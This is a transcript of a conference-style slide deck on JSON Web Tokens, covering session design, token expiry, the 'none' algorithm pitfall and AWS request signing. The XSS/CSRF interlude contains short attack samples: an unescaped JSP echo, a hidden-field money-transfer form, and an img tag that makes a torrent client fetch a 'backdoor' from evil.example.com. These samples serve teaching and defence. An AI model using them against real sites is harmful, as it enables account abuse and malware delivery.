Top Banner
JSON Web Tokens Luc Engelen
28

JSON Web Tokens

May 04, 2023

Download

Documents

Khang Minh
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Page 1: JSON Web Tokens

JSON Web TokensLuc Engelen

Page 2: JSON Web Tokens

Myself2006 ‑ 2014: Researcher at TU/e

2014 ‑ 2016: iOS and Java developer at ISAAC

2016 ‑ present: (Mostly) Java developer at Kabisa

Page 3: JSON Web Tokens

KabisaWeb apps ‑ Hybrid mobile apps

Ruby on Rails ‑ Java ‑ Elixir

Backbone ‑ Marionette ‑ React

Agile ‑ TDD ‑ BDD

Weert ‑ Amsterdam

Page 4: JSON Web Tokens

What's the problem?

Page 5: JSON Web Tokens

nginxYour device

Postgres

Spring

Spring

Spring

Page 6: JSON Web Tokens

Client

Client

Server

Server

username and password

start session

sessionToken

request with sessionToken

response

request with sessionToken

response

request with sessionToken

error

Page 7: JSON Web Tokens

eyJhbGciOiJIUzUxMiJ9.eyJleHAiOjE0NzYyOTAxNDksInN1YiI6IjEifQ.mvJEWu3kxm0WSUKu‑qEVTBmuelM‑2Te‑VJHEFclVt_uR89ya0hNawkrgftQbAd‑28lycLX2jXCgOGrA3XRg9Jg

Page 8: JSON Web Tokens

{ "alg": "HS512"}

{ "sub": "1", "admin": false}

HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)

Page 9: JSON Web Tokens

Client

Client

Server

Server

username and password

construct JWT

JWT

request with JWT

check JWT

response

request with JWT

check JWT

response

Page 10: JSON Web Tokens

Where to leave these tokens?In a cookie?

In a header?

Page 11: JSON Web Tokens

Intermezzo: XSS and CSRF

XSS

Someone is able to have their scripts executed as part of your webapplication.

<% String eid = request.getParameter("eid"); %> ... Employee ID: <%= eid %>

Page 12: JSON Web Tokens

Intermezzo: XSS and CSRF

CSRF

Someone else's web application secretly lets its visitors performactions with your web application due to cookies still present fromprevious visits.

<form action="http://bank.com/transfer.do" method="POST"><input type="hidden" name="acct" value="MARIA"/><input type="hidden" name="amount" value="100000"/><input type="submit" value="View my pictures"/></form>

Page 13: JSON Web Tokens

Intermezzo: XSS and CSRF

print "<html>"print "Latest comment:"print database.latestCommentprint "</html>"

Page 14: JSON Web Tokens

Intermezzo: XSS and CSRF

<img src="http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent">

Page 15: JSON Web Tokens

Where to leave these tokens?In a cookie?

In a header?

Page 16: JSON Web Tokens

Defence against CSRF is straightforwardand durable

1. Check the origin and referer headers

2. Check for some other header you're setting, such as X‑Requested‑With

See www.owasp.org

http://www.owasp.org/
Page 17: JSON Web Tokens

What happens when I change mypassword?

{ "alg": "HS512"}

{ "sub": "1", "admin": false}

HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)

Page 18: JSON Web Tokens

When should a JWT expire?As soon as possible, to prevent misuse for long periods

As late as possible, so that users don't have te re‑authenticateall the time

Page 19: JSON Web Tokens

When should a JWT expire?Introduce a short‑lived token used for authentication per request

Introduce a long‑lived token used to generate a new short‑livedtoken when needed

The long‑lived token is used in combination with a blacklist ofretracted tokens

Page 20: JSON Web Tokens

Should I accept all "valid" JWTs?No, because "none" is a valid algorithm

The key you use to check the signature should match thealgorithm

See https://auth0.com/blog/critical‑vulnerabilities‑in‑json‑web‑token‑libraries/

https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/
Page 21: JSON Web Tokens

What happens when I delete myaccount?

{ "alg": "HS512"}

{ "sub": "1", "admin": false}

HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)

Page 22: JSON Web Tokens

How do I apply this idea to server‑to‑server communication?

Page 23: JSON Web Tokens

POST /api/session HTTP/1.1Host: 54.194.126.161Connection: keep-aliveContent-Length: 31Accept: */*Origin: http://54.194.126.161X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36Content-Type: application/jsonReferer: http://54.194.126.161/loginAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.8,nl;q=0.6Cookie: JSESSIONID=37AA2A85693E255315D532C845FDE47B{"username":"a","password":"a"}

Page 24: JSON Web Tokens

http://docs.aws.amazon.com/AmazonS3/latest/API/sig‑v4‑header‑based‑auth.html

http://docs.aws.amazon.com/AmazonS3/latest/API/sig-v4-header-based-auth.html
Page 25: JSON Web Tokens
Page 26: JSON Web Tokens
Page 27: JSON Web Tokens

GET ?lifecycle HTTP/1.1Host: examplebucket.s3.amazonaws.comAuthorization: SignatureToBeCalculatedx-amz-date: 20130524T000000Z x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

GET/lifecycle=host:examplebucket.s3.amazonaws.comx-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991bx-amz-date:20130524T000000Z

host;x-amz-content-sha256;x-amz-datee3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Page 28: JSON Web Tokens

See for yourselfhttps://github.com/ljpengelen

https://github.com/ljpengelen

Related Documents
Thomas Darimont - javaland.eu · • Uses OAuth 2.0 tokens + IDToken to encode Identity • Tokens are encoded as JSON Web Tokens (JWT) • Requires secure channel HTTPS/TLS • SAML

Thomas Darimont - javaland.eu · • Uses OAuth 2.0 tokens....

Category: Documents
DEF CON 26 Hacking Conference CON 26/DEF CON 26 workshops... · 2020. 5. 16. · Attacking JSON WEB TOKENS ... JWS allows you to add a “jwk” attribute (JSON Web Key) to the header

DEF CON 26 Hacking Conference CON 26/DEF CON 26...

Category: Documents
JAWS V1.06 - JSON API Web Service.docx - Server Technology

JAWS V1.06 - JSON API Web Service.docx - Server Technology

Category: Documents
Heroes AcademyWat is een JSON Web Token? “JSON Web Tokens are an open, industry standard RFC 7519 method for representing claims securely between two parties.” Bestaat uit •

Heroes AcademyWat is een JSON Web Token? “JSON Web Tokens....

Category: Documents
API referencepublic.picturesafe.cloud/picturesafe-search/1.0.1/API-Reference.pdfThe REST API uses JSON Web Tokens (JWT) for authorization. You have to provide a valid JWT in the authorization

API...

Category: Documents
Securing RESTful Web Services using Multiple JSON Web Tokens · RESTful web services plays an important reole in service scalability. Because servers do not store session data this

Securing RESTful Web Services using Multiple JSON Web...

Category: Documents
JSON Web Service Interface - MYOB · MYOB PayBy JSON Web Service Interface 3 1. OVERVIEW The JSON web service interface aims to: + Reduce the issues and overheads for merchants implementing

JSON Web Service Interface - MYOB · MYOB PayBy JSON Web...

Category: Documents
JSON API Services with Advanced Web - DrupalCon Web... ...

JSON API Services with Advanced Web - DrupalCon Web... ...

Category: Documents
Introduction to JSON in DataFlex · 2018. 3. 16. · 7 JSON in DataFlex • Web Services –Built in JSON support –Every DataFlex Web-Service can be called using JSON –JSON parsing

Introduction to JSON in DataFlex · 2018. 3. 16. · 7 JSON...

Category: Documents
JSON Web Key (JWK)

JSON Web Key (JWK)

Category: Documents
No Way, JOSE! - PHP Security & Web Cryptography · JSON Web Tokens Quoth the RFC: – JSON Web Token (JWT) is a compact, URL-safe means of representing claims to be transferred between

No Way, JOSE! - PHP Security & Web Cryptography · JSON Web...

Category: Documents
JQuery, JSON - Web Technologies I.users.iit.uni-miskolc.hu/~tothzs/edu/webtech/lectures/06AJAX.pdf · Jackson JSON Processor org.json json–simple google–gson xjc, JAXB C# fastJSON

JQuery, JSON - Web Technologies...

Category: Documents